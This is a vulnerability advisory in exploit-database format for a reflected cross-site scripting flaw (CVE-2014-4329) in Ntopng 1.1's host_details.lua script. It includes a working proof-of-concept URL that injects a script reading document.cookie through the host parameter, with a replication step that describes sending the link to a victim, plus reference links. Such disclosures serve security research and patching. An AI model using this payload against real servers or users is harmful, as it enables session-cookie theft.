Ntop-NG 1.1 Cross Site Scripting

`# Exploit Title: Cross Site Scripting Vulnerability in Ntop-NG (CVE-2014-4329)  
# CVE : CVE-2014-4329  
# Date: 2 July 2014  
# Exploit Author: Madhu Akula  
# Vendor Homepage: http://www.ntop.org/  
# Software Link: http://www.ntop.org/get-started/download/  
# Version : Ntopng 1.1  
# Severity: High  
# Tested on: Ubuntu & Windows  
# URL:   
http://[domain]:3000/lua/host_details.lua?host=<script>alert(document.cookie)</script>  
  
  
# Issue Details :  
  
Ntopng is vulnerable to cross-site scripting, caused by improper   
validation of user-supplied input by the host_details.lua script. A   
remote attacker could exploit this vulnerability using the host   
parameter in a specially-crafted URL to execute script in a victim's Web   
browser within the security context of the hosting Web site, once the   
URL is clicked. An attacker could use this vulnerability to steal the   
victim's cookie-based authentication credentials.  
  
  
# Steps to replicate: (POC)  
  
1. Replace the domain with the host and send this to Victim (or) Open it  
  
http://[domain]:3000/lua/host_details.lua?host=<script>alert(document.cookie)</script>  
  
I attached a screenshot also for POC  
  
  
# References :  
  
http://www.securityfocus.com/bid/66456  
https://svn.ntop.org/bugzilla/show_bug.cgi?id=379  
http://xforce.iss.net/xforce/xfdb/92135  
http://cve.circl.lu/cve/CVE-2014-4329  
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4329  
http://cxsecurity.com/cveshow/CVE-2014-4329/  
http://www.secuobs.com/revue/news/519877.shtml  
  
  
Madhu Akula  
Information Security Researcher  
https://www.twitter.com/madhuakula  
`